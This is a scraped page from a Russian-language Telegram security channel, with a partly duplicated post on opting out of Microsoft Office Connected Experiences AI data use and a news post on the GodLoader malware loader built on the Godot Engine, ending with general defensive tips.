2⃣ Найдите опцию, связанную с Connected Experiences.
3⃣ Отключите функции, связанные с передачей данных для ИИ.
💡 А что так можно было?
Технологические компании всё чаще используют пользовательские данные для обучения своих моделей. Однако подобный подход вызывает вопросы об этичности использования материалов без явного согласия. Несмотря на это, в пользовательском соглашении Microsoft указано, что компания имеет право обрабатывать контент для улучшения своих продуктов и услуг.
Для тех, кто заботится о безопасности данных, эти изменения — важный сигнал к пересмотру использования облачных и офисных решений.
Stay secure and read SecureTechTalks 📚
#конфиденциальность #ИИ #кибербезопасность #Microsoft #SecureTechTalks
В функциях Connected Experiences, встроенных в Microsoft Office, произошли изменения. Теперь контент, создаваемый пользователями в приложениях, может быть использован для обучения искусственного интеллекта, если пользователь не отключил эту опцию. На проблему обратил внимание пользователь одной из соцсетей, однако официальных комментариев от Microsoft пока не последовало.
📌 По умолчанию документы, такие как статьи, отчёты и даже личные заметки, могут стать частью набора данных для обучения ИИ. Для защиты своей интеллектуальной собственности и конфиденциальной информации пользователям рекомендуется изменить настройки.
🔍 Как отключить передачу данных?
1⃣ Зайдите в настройки Office.
2⃣ Найдите опцию, связанную с Connected Experiences.
3⃣ Отключите функции, связанные с передачей данных для ИИ.
💡 А что так можно было?
Технологические компании всё чаще используют пользовательские данные для обучения своих моделей. Однако подобный подход вызывает вопросы об этичности использования материалов без явного согласия. Несмотря на это, в пользовательском соглашении Microsoft указано, что компания имеет право обрабатывать контент для улучшения своих продуктов и услуг.
Для тех, кто заботится о безопасности данных, эти изменения — важный сигнал к пересмотру использования облачных и офисных решений.
Stay secure and read SecureTechTalks 📚
#конфиденциальность #ИИ #кибербезопасность #Microsoft #SecureTechTalks
🔥1
🎮 Играем не по правилам:
Киберпреступники нашли новый способ доставки вредоносного ПО, используя Godot Engine — популярный open-source игровой движок. С его помощью создан malware-loader GodLoader, который остаётся невидимым для антивирусов и атакует различные платформы, включая Windows, macOS и Linux.
💻 Как работает GodLoader?
1⃣ Вредоносное ПО использует .pck-файлы Godot для распространения заражённых скриптов.
2⃣ Скрипты запускаются через встроенные функции движка, загружая дополнительные вредоносные программы.
3⃣ Преступники применяют язык программирования GDScript для внедрения сложных методов, таких как анти-песочница, анти-VM и удалённая загрузка полезных нагрузок.
🚀 Масштабы атаки:
- Уже инфицировано более 17,000 устройств.
- Злоумышленники нацелены на разработчиков, которые могут случайно интегрировать вредоносный код в свои проекты, а также на геймеров, скачивающих моды и читы.
- Потенциальная аудитория атаки — свыше 1,2 миллиона пользователей игр, созданных на Godot.
🌐 Методы распространения:
GodLoader распространяется через сеть GitHub-аккаунтов, известную как Stargazers Ghost Network. Эта система использует более 200 репозиториев и 225 аккаунтов, чтобы распространять вредоносные программы под видом «взломанного» ПО или генераторов ключей.
🔐 Последствия:
Жертвы скачивали не лицензионное ПО, а загрузчики, которые устанавливали:
- XMRig для скрытого майнинга криптовалют.
- RedLine — инструмент для кражи данных.
🛡 Как защититься?
- Проверяйте репутацию репозиториев и пакетов на GitHub.
- Установите антивирус с поддержкой обнаружения вредоносного ПО в реальном времени.
- Избегайте использования пиратских программ.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #opensource #GodotEngine #SecureTechTalks
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1